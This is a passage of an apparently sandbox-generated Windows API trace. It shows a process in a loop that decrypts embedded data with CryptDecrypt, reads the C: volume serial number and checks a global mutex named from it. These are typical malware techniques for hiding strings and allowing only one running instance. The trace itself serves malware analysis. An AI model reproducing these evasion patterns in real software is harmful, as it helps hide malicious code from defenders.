[0214.226] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0214.226] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0214.226] CryptDestroyKey (hKey=0x29c020) returned 1 [0214.226] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0214.226] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0214.226] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0214.226] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0214.226] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0214.226] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0214.226] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0214.227] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0214.227] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0214.227] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0214.227] CryptDestroyKey (hKey=0x29c020) returned 1 [0214.227] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0214.227] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0214.227] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0214.227] CloseHandle (hObject=0x1c0) returned 1 [0214.227] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0214.227] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0214.227] Sleep (dwMilliseconds=0x3e8) [0215.241] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9668 [0215.241] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0215.241] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0215.241] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0215.241] CryptDestroyKey (hKey=0x29c020) returned 1 [0215.241] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0215.241] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0215.241] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0215.241] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0215.241] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0215.241] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0215.241] CryptDestroyKey (hKey=0x29c020) returned 1 [0215.241] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0215.242] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0215.242] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0215.242] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0215.242] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.242] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0215.242] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0215.242] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0215.242] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0215.242] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0215.242] CryptDestroyKey (hKey=0x29c020) returned 1 [0215.242] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0215.242] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0215.242] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0215.242] CloseHandle (hObject=0x1c0) returned 1 [0215.242] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0215.242] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0215.242] Sleep (dwMilliseconds=0x3e8) [0219.018] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9690 [0219.018] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0219.018] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0219.019] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0219.019] CryptDestroyKey (hKey=0x29c020) returned 1 [0219.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0219.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0219.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0219.019] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0219.019] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0219.019] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0219.019] CryptDestroyKey (hKey=0x29c020) returned 1 [0219.019] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0219.019] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0219.019] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0219.019] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0219.019] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0219.019] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0219.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0219.019] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0219.019] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0219.019] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0219.019] CryptDestroyKey (hKey=0x29c020) returned 1 [0219.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0219.019] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0219.019] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0219.019] CloseHandle (hObject=0x1c0) returned 1 [0219.019] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0219.019] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0219.020] Sleep (dwMilliseconds=0x3e8) [0220.046] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9668 [0220.046] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0220.046] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0220.046] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0220.046] CryptDestroyKey (hKey=0x29c020) returned 1 [0220.046] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0220.046] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0220.046] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0220.046] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0220.046] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0220.046] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0220.046] CryptDestroyKey (hKey=0x29c020) returned 1 [0220.046] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0220.046] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0220.046] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0220.046] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0220.046] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.046] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0220.046] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0220.046] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0220.047] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0220.047] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0220.047] CryptDestroyKey (hKey=0x29c020) returned 1 [0220.047] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0220.047] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0220.047] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0220.047] CloseHandle (hObject=0x1c0) returned 1 [0220.047] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0220.047] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0221.262] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0221.263] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0221.263] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0221.263] CryptDestroyKey (hKey=0x29c020) returned 1 [0221.263] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0221.263] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0221.263] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0221.263] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0221.263] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0221.263] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0221.263] CryptDestroyKey (hKey=0x29c020) returned 1 [0221.263] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0221.263] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0221.263] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0221.263] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0221.263] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0221.263] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0221.263] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0221.263] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0221.263] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0221.263] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0221.263] CryptDestroyKey (hKey=0x29c020) returned 1 [0221.263] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0221.263] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0221.263] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0221.263] CloseHandle (hObject=0x1c0) returned 1 [0221.263] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0221.263] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0222.386] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0222.386] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0222.386] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0222.386] CryptDestroyKey (hKey=0x29c020) returned 1 [0222.386] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0222.386] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0222.386] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0222.386] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0222.386] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0222.386] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0222.386] CryptDestroyKey (hKey=0x29c020) returned 1 [0222.386] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0222.386] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0222.386] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0222.386] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0222.386] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0222.386] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0222.386] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0222.386] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0222.386] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0222.387] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0222.387] CryptDestroyKey (hKey=0x29c020) returned 1 [0222.387] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0222.387] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0222.387] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0222.387] CloseHandle (hObject=0x1c0) returned 1 [0222.387] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0222.387] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0223.410] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0223.410] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0223.410] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0223.410] CryptDestroyKey (hKey=0x29c020) returned 1 [0223.411] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0223.411] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0223.411] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0223.411] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0223.411] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0223.411] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0223.411] CryptDestroyKey (hKey=0x29c020) returned 1 [0223.411] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0223.411] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0223.411] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0223.411] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0223.411] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0223.411] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0223.411] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0223.411] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0223.411] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0223.411] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0223.411] CryptDestroyKey (hKey=0x29c020) returned 1 [0223.411] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0223.411] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0223.411] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0223.411] CloseHandle (hObject=0x1c0) returned 1 [0223.411] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0223.411] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0224.699] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0224.699] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0224.699] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0224.699] CryptDestroyKey (hKey=0x29c020) returned 1 [0224.699] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0224.699] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0224.699] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0224.699] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0224.699] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0224.699] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, 